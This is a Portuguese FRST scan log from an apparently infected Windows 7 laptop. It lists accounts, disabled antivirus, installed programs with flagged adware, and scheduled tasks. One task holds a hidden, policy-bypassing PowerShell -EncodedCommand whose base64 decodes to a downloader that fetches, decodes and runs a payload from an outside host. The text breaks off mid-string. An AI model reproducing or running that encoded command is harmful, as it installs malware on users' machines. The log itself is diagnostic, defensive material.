Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão:17-02-2016 Executado por josejoo (2016-02-18 09:51:18) Executando a partir de C:\Users\josejoo\Desktop Windows 7 Professional Service Pack 1 (X64) (2015-09-07 23:34:33) Modo da Inicialização: Normal ========================================================== ==================== Contas: ============================= Administrador (S-1-5-21-764792763-2688571116-1659716825-500 - Administrator - Disabled) Convidado (S-1-5-21-764792763-2688571116-1659716825-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-764792763-2688571116-1659716825-1008 - Limited - Enabled) joao (S-1-5-21-764792763-2688571116-1659716825-1010 - Limited - Enabled) => C:\Users\joao.josejoao-PC.000 josejoo (S-1-5-21-764792763-2688571116-1659716825-1007 - Administrator - Enabled) => C:\Users\josejoo ==================== Central de Segurança ======================== (Se uma entrada for incluída na fixlist, será removida.) AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} FW: McAfee Firewall (Disabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D} ==================== Programas Instalados ====================== (Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.) abMedia (HKLM-x32\...\{E9AF1707-3F3A-49E2-8345-4F2D629D0876}) (Version: 2.09.2003.0 - Acer Incorporated) abPhoto (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 3.06.2000.22 - Acer Incorporated) Acer ePower Management (HKLM-x32\...\{3DB0448D-AD82-4923-B305-D001E521A964}) (Version: 6.00.3010 - Acer Incorporated) Acer eRecovery Management (HKLM-x32\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 5.00.3508 - Acer Incorporated) Acer Games (HKLM-x32\...\WildTangent acer Master Uninstall) (Version: 1.0.2.5 - WildTangent) Acer Portal (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 3.09.2002 - Acer Incorporated) Acer Registration (HKLM-x32\...\Acer Registration) (Version: 1.04.3507 - Acer Incorporated) Acer Remote Files (HKLM\...\{13885028-098C-4799-9B71-27DAC96502D5}) (Version: 1.02.2003 - Acer Incorporated) Adobe Reader XI (11.0.04) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.04 - Adobe Systems Incorporated) Agatha Christie - Death on the Nile (x32 Version: 2.2.0.98 - WildTangent) Hidden AOP Framework (HKLM-x32\...\{4A37A114-702F-4055-A4B6-16571D4A5353}) (Version: 3.15.2000.1 - Acer Incorporated) aTube Catcher versão 3.8 (HKLM-x32\...\{D43B360E-722D-421B-BC77-20B9E0F8B6CD}_is1) (Version: 3.8 - DsNET Corp) Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden BlueStacks App Player (HKLM-x32\...\{4047E0FE-CBD8-4915-BBB1-45F6CBF417AC}) (Version: 2.0.4.5627 - BlueStack Systems, Inc.) Chromium (HKU\.DEFAULT\...\Chromium) (Version: 46.0.2480.0 - Chromium) Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden Evernote v. 4.5.2 (HKLM-x32\...\{F77EF646-19EB-11E1-9A9E-984BE15F174E}) (Version: 4.5.2.5866 - Evernote Corp.) FATE (x32 Version: 2.2.0.97 - WildTangent) Hidden Final Drive: Nitro (x32 Version: 2.2.0.95 - WildTangent) Hidden Gameo (HKU\.DEFAULT\...\Gameo) (Version: 0.14.1 - IronSource Ltd.) <==== ATENÇÃO Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.109 - Google Inc.) Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden Identity Card (HKLM-x32\...\Identity Card) (Version: 1.00.3503 - Acer Incorporated) Insaniquarium Deluxe (x32 Version: 2.2.0.97 - WildTangent) Hidden Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3383 - Intel Corporation) Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 3.0.1.41 - Intel Corporation) Java 8 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218060F0}) (Version: 8.0.600.27 - Oracle Corporation) Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden Jewel Quest Mysteries: The Seventh Gate Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden John Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) Hidden McAfee LiveSafe – Internet Security (HKLM-x32\...\MSC) (Version: 14.0.4121 - McAfee, Inc.) McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.170 - McAfee, Inc.) Metric Collection SDK (x32 Version: 1.1.0012.00 - Lenovo Group Limited) Hidden Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation) Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Microsoft Office Professional Plus 2010 (HKLM\...\Office14.PROPLUS) (Version: 14.0.4763.1000 - Microsoft Corporation) Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.50401.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Mozilla Firefox 41.0.1 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 41.0.1 (x86 pt-BR)) (Version: 41.0.1 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 41.0.1.5750 - Mozilla) Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden PriceFountain (remove only) (HKU\.DEFAULT\...\PriceFountain) (Version: 1.2.9.6 - PBNGTBJJPYO) <==== ATENÇÃO Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.318 - Qualcomm Atheros Communications) Qualcomm Atheros WLAN and Bluetooth Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 12.29 - Qualcomm Atheros) Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.21257 - Realtek Semiconductor Corp.) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.88.617.2014 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7300 - Realtek Semiconductor Corp.) Slingo Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.6.21 - Synaptics Incorporated) Tales of Lagoona (x32 Version: 2.2.0.98 - WildTangent) Hidden Torchlight (x32 Version: 2.2.0.98 - WildTangent) Hidden Update for PriceFountain (HKU\.DEFAULT\...\Price Fountain) (Version: - Update for PriceFountain) <==== ATENÇÃO Virtual Villagers 4 - The Tree of Life (x32 Version: 2.2.0.97 - WildTangent) Hidden Wedding Dash (x32 Version: 2.2.0.95 - WildTangent) Hidden Welcome Center (HKLM-x32\...\Acer Welcome Center) (Version: 1.02.3507 - Acer Incorporated) WinRAR 5.30 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH) YAC(Yet Another Cleaner!) (HKLM-x32\...\iSafe) (Version: 6.7.141 - ELEX DO BRASIL PARTICIPAÇÕES LTDA) <==== ATENÇÃO Zuma Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden ==================== Exame Personalizado CLSID (Whitelisted): ========================== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) ==================== Tarefas Agendadas (Whitelisted) ============= (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) Task: {11C1BB2D-ABCF-47CB-87C2-632318010DEF} - System32\Tasks\Oelfiireaoiwi => C:\ProgramData\Oelfiireaoiwi\1.0.7.1\uheohnik.exe [2016-02-18] () Task: {43028A6D-616B-4C96-BA4F-5A69F0CFD4D1} - System32\Tasks\BacKGroundAgent => C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe [2016-01-14] (Acer Incorporated) Task: {4C42830B-AA07-45AE-A867-876E37385BF9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-08] (Google Inc.) Task: {4E3185D6-79DE-4121-8AF5-6B6D8ACE7283} - System32\Tasks\{D9CD2D34-2181-47F9-BBA9-B91F0372C472} => pcalua.exe -a C:\Users\josejoao\Downloads\OUTROS\JavaSetup8u60.exe -d C:\Users\josejoao\Downloads\OUTROS Task: {63177D68-4652-47F8-AB29-1670BD5DEB4C} - \MPC AdCleaner -> Nenhum Arquivo <==== ATENÇÃO Task: {74FF969F-A1D4-437C-AF17-30B0E05C71E3} - System32\Tasks\Launch Manager => C:\Program Files\Acer\Acer Launch Manager\LMLauncher.exe [2014-06-09] (Acer Incorporate) Task: {78FFF65C-587A-4616-81A1-11BF6DA8DE14} - System32\Tasks\AcerCloud => C:\Program Files (x86)\Acer\Acer Portal\AcerPortal.exe [2016-01-19] (Acer) Task: {A45F5DDC-4436-445A-BBD4-7119E793F921} - System32\Tasks\PFExe => C:\Windows\system32\config\systemprofile\AppData\Local\PriceFountain\pricefountain.exe <==== ATENÇÃO Task: {B293D63D-EF51-470F-B1CE-86546EE9552C} - System32\Tasks\UALU notificatin => C:\Program Files\Acer\Acer Updater\UALU.exe [2012-04-05] (Acer Incorporated) Task: {BA0A6938-AF9A-469C-8BA4-0939AE1760AB} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2015-09-09] () Task: {BA5DF0BD-50A7-40A9-B22A-85D17771E212} - System32\Tasks\{4C6887B2-54D6-447E-8B85-C47FA426E573} => pcalua.exe -a C:\Users\josejoao\AppData\Roaming\uTorrent\uTorrent.exe -c /UNINSTALL Task: {CE3BE677-6922-44E7-B039-FDC7D2592DD5} - System32\Tasks\{050C7D47-090B-090C-0D11-0D7E7E79117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGIAZQBhAHUAdAB5AGYAaQBsAGUALgBpAG4AZgBvAC8AdQAvAD8AYQA9AEEAOQBiAHkAWQB5AFYANwAzAFEATQBlAGcANgBwAG4AYwBFAFIAbwA1AHIAbQBUAGEAagBLAHcAdQBjAE8AMwBiAEoAdwBEAHMAcwBPAC0ASQBNAFAAeABsAHgAMwAzAHEAVABMAGMAOQBvADQALQBPAGoANAB4AGIAdgBEAHcANQBhAGsALQBMAHgAQQBxAHEATQBoAFYAZgBMAHAAcAB6AEYAWABvAHYANwBJAEsALQBZADEAQgBuAFoAbwB1AG8AQQBZAHoAbABpAFkALQAtAHAASgBrAGMAeQBSAGUAUABUAGcAQwBqAHYAMgBKADUASwBNAGoAVABGAEcASQBfADgARAB4AFcAWgBMAEYANQBoADYAMABLAGoAMwBZAFEAVgBYAHgARwBvAE0AeABUAFkASwBlADcAZABTAHEAbAB1AFIAcgBMAEgAdABQAHYAUQBoAEoAdAB4AFEASgBiADMAVABOADUAYQBRAHAATgB2AE8AMwBGAEsARQBmAFMAeQB5AFcAcABzAFoAMwB6AFcAQgBHAFEAMwBrAE8AcwBIAHUAMQBNAE8AUABrAHUAdgBuADQATgBlADQANAB4AE8AMgBjAG4AbAB5AHgAQQA4AHkASABOAFcASwAyAHoAZwBnAHEAZwA4AHoAaABwAF8ASwBwAG8AYgBVAE0AaQBkAEoAZABOADkAWgBTAGYAWAB1AGcAdQB0AGsAZQBmAEoAcwA3AG0AbgBJAEMAawBZAGcATQBfAGcATwAwAC0ASgBRAHUAcABkAGMAbwBwAHMAUgB0ADMAYgA2AFoAOQBWAEEAWQBQAFUAawBHAEoAcgBmAG0AaQB3AE0AbwBWAGcAXwB2AGoAdQBtAFMAOQAtADUARABEAC0AZABqAEgAcABTAGMAZgA0AFEAcABqAGkAXwB4AG8AMgBsAHIANQB5AGMAcABwAGwAVABmAG8ATABzAGgAOAB6AFUAcAA3AHcAMQBZAGoANABBAEgAcABqAF8ATgBfAHkAdgBIAHAAbwBWAHEAdABUAG4AWABsAHMASgAtAGUANAA3AEcAMwBvAHEAQgB1AEYAZwBZAEEAbgBOADcAVQBvAEMANQBJAEQAOQA1ADYALQB3AFAAdwBnAFAAdgBwAGUAZQBNAEIAbwBsAEgAcwBnAGYASABNAFAARQBqAEoAZwB3AGwAYwA3AF8AcwB2AFkANAAxAGoAYQBvADYASABHAEoAWQBCAGcAYgBaADIAcgB2AEIAMQA3AEcAZgBxADkAawA4AHUAeQBZAEIAdABrAFkAMAAtAFQAYwB2ADUAYwA2AE4AWQBzAFgAaQBWAEUAUgBZAHkAagBFAGYAbgAwAHQAOABFAFUANwBPAEwAMgBpADcASABDAFkAUAAwAHAAMABvADUAdgB5AEkAaAA4AGoAYgBYADYAZwBSAEMAcwAwAEYAUQBTADYAdABtADkAVABSAEoAMwA1AF8AcABsAG0AUQBBAEgAbQBoAEIAVQBxAEkARQBOAFkAZQBvAGkAbgBSAGQATgBmAHMAdgA1AEQAZwBPAE8AUQBnAFUAWABEADIAQgBNADYAaABJAF8AWQA3AFQAUwA0ADYAVwB0AGcALQBlADUASgBjADcARABYAHEAUABTAGgAcAB5AFAARAB1AGoAZwBWAEsASQBrAEIAVwB1AGcASwBGAGoAMgA2AHQAQwBaAGYASwBZAE0AaABuAFAAbQBNAFUAVwBLAEUAegBHADMASgA1AGIAdgBKADEAXwBqAEwAdgBuAHAAOQBrADMATwBtADQAZQA5AHYAeQAwAHoATABLAFQAMwBkAEwAZABEAFAARAB6AGEAbAAwAHgANwBOAFgAVABrAGUAUQA5ADgATQBEAE0AdwBWAFkAMQB2AHMAVgB1AEMATABKAFkAOQBXAGkASQAyAGkAcwA1AFQAYgBDAGsANgBlAHkAVgA4AG4ATAA0ADMAZAAzAHgAQwB0ADEASABfAGUAXwAxAFkAVwBxAHIATAAxAEYATQBUAHkATwAzAFoAQwBwAEoAMgAwAGMARwBkADEAcAAxAGEAZgBKAG0AZQA1AGQATgBaAHoAMwBUAEEAaQBQAEoAcQBlAE8ASQBLAFYAVgBLAHMASwBxAHEATQBRAFQAdwA4AHQAbQAtAEkAZABmADUAYwB5AE4AZwB5AHIAbwBxAEYAWgBpAHMAOABnAGMANgBqAEYALQBiADIAZQBqAFkAMwBPAFQAdgB4AEgANwB2AFkAdABQAHoAQQAzAGcAbwBVAEMAawBUAHMAZQBGAFMAOQBsAC0ARwBZAHYAYgAwAF8AcgBaAGgAWQB6AHIAVwBoAFoAYQBZAHgAZQA1AEMAYgBFAHUASQBJAEkARgAmAGMAPQByADkAVQBNADMAeABrAHEAegB1AF8AUQBTADEAdQBsADYANABRAFoAZgBuADIAQwBhAG0ATQBIAEwAagBlAHEANQBRAHQARQBhAGIAUgBDAFQAcgBiAE0AcgBxAGoAVQBBAE8ANwBWAEYAYwAtADYAMQBZAFQAegBkAGUAYQB2AGwAYQBWAHAAZABSAFAAegA3AHgASAA5AEIASwBlAGcAdABUAEEATwA0ADAAcQBMAHgAUABEAGsAagBlAE8AWgByAFQAQgBfAGoAYwBzAC0AagBLADEAUwBkAFQAdABhAGQAcwBTAEEAcQBPAHIAYgBxAHYAeQAyAEgAMQBTAEgANQByAHYAVQA1AFIAMgBXAFMAbABNAF8ALQBlAGIAbABCAGwAVAB4AGcAVQBKAHAAZQBCAG8AeABSAEMAbgBJAHUAagBmAFgANwBSAHEAUQBPAF8ARgBmAHMAVgB3ADEAMgBtAEwAVQBUAGEARwBNADIARQBiAC0AVwBTAFYAaQBNAGwAdwA3AHEAWQBVAGkAUwB1ADkASQB0AGsAYQBFAHkAagBWAEgARgBkAEcAXwBGAEEAVwBLAHkAcgBnADkAXwB2AEgASABuAEUAeQB4AEcAcAByAFIAeAB2ADgAMwBCAEYASgBCAFAAdQAwAFEANwBfAHUAZgA4AFoASAAwADkAUQB4AE8AOAAwAEsAVQB3AGgAegBaADYALQBqAC0AZQBhAEYAVgBxAGEANgBtAGUAYwBCAGIAUgBvADAAWQByAEUASwB5AFQAQgBJAG8ANABaADkAUgBPAGEAbgB4AGwAcgBVADIAMAAwAGsASABqADUAVgA4AGsATQBwADMAcwBNAC0ALQBMAHUAUwAwAEwAcABtAGgATwBrAEYAcwBqAC0ATABKAEsANQBrAEkAVgBLAHgAMgA5AEEATgBjAHMAbABRAGkAbwBiAEwAawBvAEUAMgBTAG4AcwBzAGQAcQBkAEcAcQA2AHYASwBsAHIAZwBNAFUAVwB6AHUAUABOAGoAQwByAFoAOABhAFUASgB0AE8AXwBVAEkAUgBwADMAbQBhAG0ANQBuAGUAZwBUAEYARwBkADMAaABxAGMAdgBQADYAdABzAGcAQwBhAHQAcQAyAGkATwBUAFEAZwA0AC0AYgBjAFEATAA0AHQAcgBjAGkAQQBFAGIATQBTAHgATABFAGcANwBkAHgATABVAGgAbgA1AE8ASAB2AEgAdAB4AHIAcQBoAEQAUQBqAFUAegBBAE8ARABvAHAAYgB3AFUATgBYAE8AZABXADcAUABjAFQATAB3AEcAeABlAGMARQA4AFUARABfAFIAeAB1AGIATQA0AHgATgBpADAAUwBVAFEAdwBlADkATwBfAFMAawBWAEMARQAtAFcAZABUAHUAbQBBADIAZgBwAEUAeABhAGQAZwB0ADcAbQBqAGoANABrAC0AcgBjAGcAQgBuAGkAWABMAC0ALQBKAFIASQA5AGkAbgBNADAAcABFAC0ASgBPADIAVgBwAHIARwBaAEgAaQBPAGYAdwA5AEsATQBoAHYAdwBHAGUARgBrAGEAdQBzADQAbwBIAGoAYwA2AEQASABhAF8AVgB2AGYATABQAGQATwA0AEgAMgBzAFgAVwB5ADIAawBNADAAMgAzAGEARgBNAEkAdAA3AE4AWgB6AFYAVwBoAEkAdABsAGMAagBxAGoASgBNAGkARAA4AEwARQB5AEIAcwBZADcAZQA1AGcATwAyAEcASgBSAFEAOAB1AGEARABDAEkAcwBRAGsAVABfAFAARgBsAFYARQBHADEAegBVAFAAdQAtAFQAVQBLAFMAYgBrAEMAdQBRADAAMgBtAGIAdwBCAGgAcABJAGcAYwBmAHUAbwBSAEQATwBLADgAWgBfAFUAeQBEAHgAZwBXAEkAagBfAHgAVQBGAC0AdQB5AGkAcQBLAHoAbgBDAEYAagBRAFoAbgBwAGcAcgA3AGEARQBFAFkAVABoAFIAaQBZAEwAYwBEAFYATABXAFMALQBYAHEATAAtAHMAOQBuAE8ASgBFAEEAZwBoAGkAUgBpAEgAVgBOAFcAZgA0AGEATQBjAFYATQBtAFQANwA4AFAAVgBNAEwAcgBiAFkAZQBaADYAYQBhAFkAdQAyAE8ARwA4AGgAOABPAHMAQQBaADAAawB2AHYAbAB1AGsAVwB4AG8AWAB4ADQARgBYAFIANAByAGcAQQAyAG8AbwA0ADYANwBwAFoAQgBFAGEAMQA1AFQATwBkAFIAQgBDAHMAMQA5AEYARQBzAGEAUwBBAEcAMABTAHUASgA1AFUARQBzAEUARAAyAHEAOABIAEoAcQBSAGYALQBSAEcAVwAwAGQAeQB2AHYAUwBPAFcAcABfADEAbQBFAFoAVgA5AHkAdABsAHIAagBnAFkAdQBlADQASABuACYAcgA9ADQAMwA2ADAAMQA5ADQANAAzADMANAA5ADUANgA3ADQANwA2ADkAIgA7ACQAcwB0AHMAawA9ACIAewAwADUAMABDADcARAA0ADcALQAwADkAMABCAC0AMAA5ADAAQwAtADAARAAxADEALQAwAEQANwBFADcARQA3ADkAMQAxADcAQQB9ACIAOwAkAHAAcgBpAGQAPQAiAFMAeQBzAHQAZQBtAEgAZQBhAGwAZQByACIAOwAkAGkAbgBpAGQAPQAiAFEAUABNAEYATwBMAFEARwAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAG